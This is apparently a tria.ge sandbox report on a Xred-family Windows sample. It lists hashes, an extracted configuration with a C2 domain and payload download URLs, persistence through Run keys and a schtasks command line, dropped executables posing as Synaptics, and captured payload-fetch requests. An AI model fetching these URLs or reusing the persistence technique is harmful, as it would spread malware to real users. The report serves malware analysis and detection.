Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
150s -
max time network
146s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
31/12/2024, 02:34 UTC
Behavioral task
behavioral1
Sample
71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe
Resource
win10v2004-20241007-en
General
-
Target
71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe
-
Size
1.6MB
-
MD5
27bcc0d927e9f13250b1dff9e122e9af
-
SHA1
2f9f09f46fe7ee2a495247292b3f2be0777c2873
-
SHA256
71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1
-
SHA512
1bdf5d3ba61b8d99955b92b87377fcbea08db248aae1089a9028a0613eb06c43e330bd781edf66ec955b1042c811094207b8962e391b37fc516a4b93664c7653
-
SSDEEP
49152:cnsHyjtk2MYC5GDchloJf5fj22pkXaxMa:cnsmtk2alhlyLZ
Malware Config
Extracted
xred
xred.mooo.com
-
email
xredline1@gmail.com
-
payload_url
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1
http://xred.site50.net/syn/SUpdate.ini
https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1
http://xred.site50.net/syn/Synaptics.rar
https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1
http://xred.site50.net/syn/SSLLibrary.dll
Signatures
-
Xred family
-
resource behavioral1/files/0x000600000001961e-99.dat behavioral1/files/0x00060000000196a1-123.dat -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MHDFGY.lnk ._cache_71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe -
Executes dropped EXE 5 IoCs
pid Process 2384 ._cache_71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe 2720 Synaptics.exe 2768 ._cache_Synaptics.exe 2528 KQNALS.exe 2940 KQNALS.exe -
Loads dropped DLL 6 IoCs
pid Process 2136 71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe 2136 71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe 2136 71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe 2720 Synaptics.exe 2720 Synaptics.exe 2384 ._cache_71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver = "C:\\ProgramData\\Synaptics\\Synaptics.exe" 71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\MHDFGY = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windata\\KQNALS.exe\"" ._cache_71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe -
AutoIT Executable 11 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/memory/2768-49-0x0000000000C90000-0x0000000000E7E000-memory.dmp autoit_exe behavioral1/memory/2384-131-0x0000000000840000-0x0000000000A2E000-memory.dmp autoit_exe behavioral1/memory/2384-133-0x0000000000840000-0x0000000000A2E000-memory.dmp autoit_exe behavioral1/memory/2384-140-0x0000000000840000-0x0000000000A2E000-memory.dmp autoit_exe behavioral1/memory/2528-144-0x00000000001E0000-0x00000000003CE000-memory.dmp autoit_exe behavioral1/memory/2528-145-0x00000000001E0000-0x00000000003CE000-memory.dmp autoit_exe behavioral1/memory/2384-178-0x0000000000840000-0x0000000000A2E000-memory.dmp autoit_exe behavioral1/memory/2384-180-0x0000000000840000-0x0000000000A2E000-memory.dmp autoit_exe behavioral1/memory/2384-184-0x0000000000840000-0x0000000000A2E000-memory.dmp autoit_exe behavioral1/memory/2940-189-0x0000000000E40000-0x000000000102E000-memory.dmp autoit_exe behavioral1/memory/2384-194-0x0000000000840000-0x0000000000A2E000-memory.dmp autoit_exe -
resource yara_rule behavioral1/files/0x000a0000000122d0-4.dat upx behavioral1/memory/2384-18-0x0000000000840000-0x0000000000A2E000-memory.dmp upx behavioral1/memory/2768-41-0x0000000000C90000-0x0000000000E7E000-memory.dmp upx behavioral1/memory/2768-49-0x0000000000C90000-0x0000000000E7E000-memory.dmp upx behavioral1/memory/2384-131-0x0000000000840000-0x0000000000A2E000-memory.dmp upx behavioral1/memory/2384-133-0x0000000000840000-0x0000000000A2E000-memory.dmp upx behavioral1/memory/2384-140-0x0000000000840000-0x0000000000A2E000-memory.dmp upx behavioral1/memory/2528-144-0x00000000001E0000-0x00000000003CE000-memory.dmp upx behavioral1/memory/2528-145-0x00000000001E0000-0x00000000003CE000-memory.dmp upx behavioral1/memory/2384-178-0x0000000000840000-0x0000000000A2E000-memory.dmp upx behavioral1/memory/2384-180-0x0000000000840000-0x0000000000A2E000-memory.dmp upx behavioral1/memory/2384-184-0x0000000000840000-0x0000000000A2E000-memory.dmp upx behavioral1/memory/2940-187-0x0000000000E40000-0x000000000102E000-memory.dmp upx behavioral1/memory/2940-189-0x0000000000E40000-0x000000000102E000-memory.dmp upx behavioral1/memory/2384-194-0x0000000000840000-0x0000000000A2E000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 10 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ._cache_Synaptics.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WSCript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language KQNALS.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language KQNALS.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ._cache_71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Synaptics.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EXCEL.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Enumerates system info in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
NTFS ADS 1 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Local\Temp\winmgmts:\localhost\root\SecurityCenter2 ._cache_71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1688 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2788 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2384 ._cache_71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe 2384 ._cache_71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe 2384 ._cache_71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe 2384 ._cache_71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe 2384 ._cache_71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe 2384 ._cache_71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe 2384 ._cache_71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe 2384 ._cache_71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe 2384 ._cache_71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe 2384 ._cache_71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe 2384 ._cache_71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe 2384 ._cache_71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe 2384 ._cache_71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe 2384 ._cache_71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe 2384 ._cache_71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe 2384 ._cache_71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe 2384 ._cache_71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe 2384 ._cache_71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe 2384 ._cache_71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe 2384 ._cache_71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe 2384 ._cache_71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe 2384 ._cache_71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe 2384 ._cache_71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe 2384 ._cache_71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe 2384 ._cache_71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe 2384 ._cache_71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe 2384 ._cache_71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe 2384 ._cache_71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe 2384 ._cache_71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe 2384 ._cache_71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe 2384 ._cache_71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe 2384 ._cache_71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe 2384 ._cache_71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe 2384 ._cache_71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe 2384 ._cache_71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe 2384 ._cache_71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe 2384 ._cache_71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe 2384 ._cache_71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe 2384 ._cache_71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe 2384 ._cache_71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe 2384 ._cache_71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe 2384 ._cache_71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe 2384 ._cache_71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe 2384 ._cache_71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe 2384 ._cache_71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe 2384 ._cache_71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe 2384 ._cache_71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe 2384 ._cache_71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe 2384 ._cache_71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe 2384 ._cache_71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe 2384 ._cache_71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe 2384 ._cache_71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe 2384 ._cache_71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe 2384 ._cache_71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe 2384 ._cache_71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe 2384 ._cache_71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe 2384 ._cache_71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe 2384 ._cache_71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe 2384 ._cache_71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe 2384 ._cache_71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe 2384 ._cache_71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe 2384 ._cache_71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe 2384 ._cache_71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe 2384 ._cache_71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 2384 ._cache_71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2788 EXCEL.EXE -
Suspicious use of WriteProcessMemory 32 IoCs
description pid Process procid_target PID 2136 wrote to memory of 2384 2136 71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe 30 PID 2136 wrote to memory of 2384 2136 71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe 30 PID 2136 wrote to memory of 2384 2136 71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe 30 PID 2136 wrote to memory of 2384 2136 71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe 30 PID 2136 wrote to memory of 2720 2136 71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe 31 PID 2136 wrote to memory of 2720 2136 71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe 31 PID 2136 wrote to memory of 2720 2136 71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe 31 PID 2136 wrote to memory of 2720 2136 71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe 31 PID 2720 wrote to memory of 2768 2720 Synaptics.exe 32 PID 2720 wrote to memory of 2768 2720 Synaptics.exe 32 PID 2720 wrote to memory of 2768 2720 Synaptics.exe 32 PID 2720 wrote to memory of 2768 2720 Synaptics.exe 32 PID 2384 wrote to memory of 1444 2384 ._cache_71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe 34 PID 2384 wrote to memory of 1444 2384 ._cache_71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe 34 PID 2384 wrote to memory of 1444 2384 ._cache_71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe 34 PID 2384 wrote to memory of 1444 2384 ._cache_71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe 34 PID 2384 wrote to memory of 2656 2384 ._cache_71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe 36 PID 2384 wrote to memory of 2656 2384 ._cache_71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe 36 PID 2384 wrote to memory of 2656 2384 ._cache_71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe 36 PID 2384 wrote to memory of 2656 2384 ._cache_71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe 36 PID 1444 wrote to memory of 1688 1444 cmd.exe 37 PID 1444 wrote to memory of 1688 1444 cmd.exe 37 PID 1444 wrote to memory of 1688 1444 cmd.exe 37 PID 1444 wrote to memory of 1688 1444 cmd.exe 37 PID 1308 wrote to memory of 2528 1308 taskeng.exe 43 PID 1308 wrote to memory of 2528 1308 taskeng.exe 43 PID 1308 wrote to memory of 2528 1308 taskeng.exe 43 PID 1308 wrote to memory of 2528 1308 taskeng.exe 43 PID 1308 wrote to memory of 2940 1308 taskeng.exe 44 PID 1308 wrote to memory of 2940 1308 taskeng.exe 44 PID 1308 wrote to memory of 2940 1308 taskeng.exe 44 PID 1308 wrote to memory of 2940 1308 taskeng.exe 44
Processes
-
C:\Users\Admin\AppData\Local\Temp\71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe"C:\Users\Admin\AppData\Local\Temp\71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe"1⤵
- Loads dropped DLL
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2136 -
C:\Users\Admin\AppData\Local\Temp\._cache_71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe"C:\Users\Admin\AppData\Local\Temp\._cache_71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe"2⤵
- Drops startup file
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of WriteProcessMemory
PID:2384 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn MHDFGY.exe /tr C:\Users\Admin\AppData\Roaming\Windata\KQNALS.exe /sc minute /mo 13⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1444 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn MHDFGY.exe /tr C:\Users\Admin\AppData\Roaming\Windata\KQNALS.exe /sc minute /mo 14⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1688
-
-
-
C:\Windows\SysWOW64\WSCript.exeWSCript C:\Users\Admin\AppData\Local\Temp\MHDFGY.vbs3⤵
- System Location Discovery: System Language Discovery
PID:2656
-
-
-
C:\ProgramData\Synaptics\Synaptics.exe"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2720 -
C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe"C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe" InjUpdate3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2768
-
-
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2788
-
C:\Windows\system32\taskeng.exetaskeng.exe {0D044ABB-7187-41C3-965A-74A40DFEA217} S-1-5-21-2703099537-420551529-3771253338-1000:XECUDNCD\Admin:Interactive:[1]1⤵
- Suspicious use of WriteProcessMemory
PID:1308 -
C:\Users\Admin\AppData\Roaming\Windata\KQNALS.exeC:\Users\Admin\AppData\Roaming\Windata\KQNALS.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2528
-
-
C:\Users\Admin\AppData\Roaming\Windata\KQNALS.exeC:\Users\Admin\AppData\Roaming\Windata\KQNALS.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2940
-
Network
-
Remote address:8.8.8.8:53Requestxred.mooo.comIN AResponse
-
Remote address:8.8.8.8:53Requestfreedns.afraid.orgIN AResponsefreedns.afraid.orgIN A69.42.215.252
-
GEThttp://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978Synaptics.exeRemote address:69.42.215.252:80RequestGET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1
User-Agent: MyApp
Host: freedns.afraid.org
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Tue, 31 Dec 2024 02:34:25 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Cache: MISS
-
Remote address:8.8.8.8:53Requestdocs.google.comIN AResponsedocs.google.comIN A216.58.214.174
-
Remote address:216.58.214.174:443RequestGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
User-Agent: Synaptics.exe
Host: docs.google.com
Cache-Control: no-cache
ResponseHTTP/1.1 303 See Other
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Tue, 31 Dec 2024 02:35:19 GMT
Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
Strict-Transport-Security: max-age=31536000
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Content-Security-Policy: script-src 'report-sample' 'nonce-G8NDTNXLElT7pKj1nlxlAw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Cross-Origin-Opener-Policy: same-origin
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Server: ESF
Content-Length: 0
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
-
Remote address:216.58.214.174:443RequestGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
User-Agent: Synaptics.exe
Host: docs.google.com
Cache-Control: no-cache
Cookie: NID=520=Wjug36hbPzv8XLExjBSHAdBwYsEfecKyGf9fCR_xNVL7RM2TxtsoMp8iG4TWIsiFPhyqq5c7q9Ka9YUoDC-um1DkyCWLZ5nj28p6k_vUFeSu0nQeB-s85dDHem7GA1T5XAA0KVQAXgvkoPYkLMwebZUm2eJ0GGCtQAYSdsHni1wkhV6H
ResponseHTTP/1.1 303 See Other
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Tue, 31 Dec 2024 02:35:20 GMT
Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
Strict-Transport-Security: max-age=31536000
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Content-Security-Policy: script-src 'report-sample' 'nonce-f1sx_WG4uMd68CGgXixk2A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Cross-Origin-Opener-Policy: same-origin
Server: ESF
Content-Length: 0
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
-
Remote address:216.58.214.174:443RequestGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
User-Agent: Synaptics.exe
Host: docs.google.com
Cache-Control: no-cache
Cookie: NID=520=Wjug36hbPzv8XLExjBSHAdBwYsEfecKyGf9fCR_xNVL7RM2TxtsoMp8iG4TWIsiFPhyqq5c7q9Ka9YUoDC-um1DkyCWLZ5nj28p6k_vUFeSu0nQeB-s85dDHem7GA1T5XAA0KVQAXgvkoPYkLMwebZUm2eJ0GGCtQAYSdsHni1wkhV6H
ResponseHTTP/1.1 303 See Other
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Tue, 31 Dec 2024 02:35:20 GMT
Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
Strict-Transport-Security: max-age=31536000
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Content-Security-Policy: script-src 'report-sample' 'nonce-5C_fLgQulMr83VWp9SM4xA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Cross-Origin-Opener-Policy: same-origin
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Server: ESF
Content-Length: 0
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
-
Remote address:8.8.8.8:53Requestc.pki.googIN AResponsec.pki.googIN CNAMEpki-goog.l.google.compki-goog.l.google.comIN A142.250.179.67
-
Remote address:142.250.179.67:80RequestGET /r/r1.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: c.pki.goog
ResponseHTTP/1.1 200 OK
Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
Cross-Origin-Resource-Policy: cross-origin
Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
Content-Length: 854
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 0
Date: Tue, 31 Dec 2024 02:07:48 GMT
Expires: Tue, 31 Dec 2024 02:57:48 GMT
Cache-Control: public, max-age=3000
Age: 1651
